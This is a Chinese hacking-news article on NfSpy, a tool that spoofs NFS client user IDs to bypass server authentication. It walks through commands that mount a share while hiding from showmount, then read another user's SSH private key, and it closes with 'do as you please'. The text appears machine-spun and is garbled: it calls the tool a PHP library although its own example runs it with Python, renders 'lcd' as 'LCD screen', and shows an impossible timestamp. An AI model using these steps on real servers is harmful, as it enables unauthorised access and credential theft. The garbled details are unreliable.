具有ID欺骗功能的NFS客户端 – NfSpy

具有ID欺骗功能的NFS客户端 – NfSpy

黑客软件hacker2019-06-19 9:21:0811132A+A-

"NfSpy介绍

NfSpy是1个开源系统的PHP库,当你载入1个NFS文件共享服务项目时,它能够全自动仿冒出NFS凭据。该专用工具包括下边2个汇编程序:

具有ID欺骗功能的NFS客户端 – NfSpy 第1张

1.    nfspy:nfspy应用了客户室内空间文件系统(FUSE)库在Linux服务平台中载入NFS文件共享服务项目。这将容许我们应用相近grep和find那样的基本文件搜索和操作命令来查寻NFS所export出来的数据结构。

2.    nfspysh:nfspysh是1个类ftp客户端的互动式Shell,能够用于查寻NFS export。它不用应用FUSE库,因而它能够在非Linux服务平台上运作。

漏洞利用

v4版本号以前的NFS取决于服务器主机对身份认证体制的信赖关联。NFS网络服务器会信赖这些根据同样客户Id(与共享资源文件系统的UID同样)开展身份认证的手机客户端机器设备,这类体制适用NIS、NIS+和LDAP域,但只能这种机器设备沒有遭受进攻或真实身份并不是仿冒的前提条件下这类认证体制才合理,由于NFS协议书所应用的惟一的身份认证要素就是说手机客户端机器设备传送回来的UID或GID(Group Id)。这也就代表,要是我们可以仿冒手机客户端机器设备的浏览Id,我们就可以绕开NFS网络服务器的身份认证了。

NfSpy免费下载

【下载链接】

NfSpy的应用

下边那条指令能够显示信息出客户的能选实际操作项(查询协助):

nfspy –help

应用实例

下边是1个运作于192.168.1.124的NFS网络服务器。

$ showmount -e 192.168.1.124 Export list For 192.168.1.124:

/home (everyone)

挂载并共享资源以后,我们能够根据sudo来将其与1个权利端口号开展关联,而allow_other选择项将容许随意客户应用这一文件系统。温馨提醒下边的“hide”选择项,应用了这一选择项以后,别人将没法根据showmount –a来查询当今网络服务器的共享资源目录中是不是有了你。

$ sudo nfspy -o server=192.168.1.124:/home,hide,allow_other,por,intr/mnt

接下去,我也能够为所欲为啦!好好地享有吧…

$ Cd /mnt

/mnt$ ls -l

drwx------ 73 8888 150 4096 2013-08-08 06:56 smithj

/mnt$ Cd smithj

/mnt/smithj$ cat .ssh/Id.rsa

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: DES-EDE3-CBC,40AEB543E512CA19

<snip>

实际操作进行以后,你能应用fusermount开展卸载掉:

$ sudo fusermount -u /mnt

nfspysh的应用

nfspysh所适用应用的实际操作选择项基础与NfSpy的同样,因此诸位同学们能够立即参照上边的內容。我们这儿一样能够应用“help”指令查询协助信息内容。

$ sudo PYTHONPATH=. python scripts/nfspysh -oserver=127.0.0.1:/home/miller/nfs nfspy@127.0.0.1:/home/miller/nfs:/> ls

/: 040775  1500  1500      4096 2016-02-12 21:30:38 . 040775  1500  1500      4096 2016-02-12 21:30:38 ._ 040775  1500  1500      4096 2016-02-12 06:41:47 public 040775  1500  1500      4096 2016-02-12 21:27:50 more 040700     0  1500      4096 2016-02-12 06:37:13 secrets 100666  1500  1500         5 2016-02-12 21:29:81 README.md 120777  1500  1500        23 2016-02-12 12:03:28 nmap -> /usr/local/share/nmap nfspy@127.0.0.1:/home/miller/nfs:/more> help

Known commands:     Cd

    chmod

    chown

    exit

    set

    help

    液晶显示屏

    lpwd

    ls

    mkdir

    m


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 掩吻各空2022-05-28 10:46:54
  •     23 2016-02-12 12:03:28 nmap -> /usr/local/share/nmap nfspy@127.0.0.1:/home/miller/nfs:/
  • 舔夺迷麇2022-05-28 16:06:32
  • 21:30:38 ._ 040775  1500  1500      4096 2016-02-12 06:41:47 public 040775  1500  1500   

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理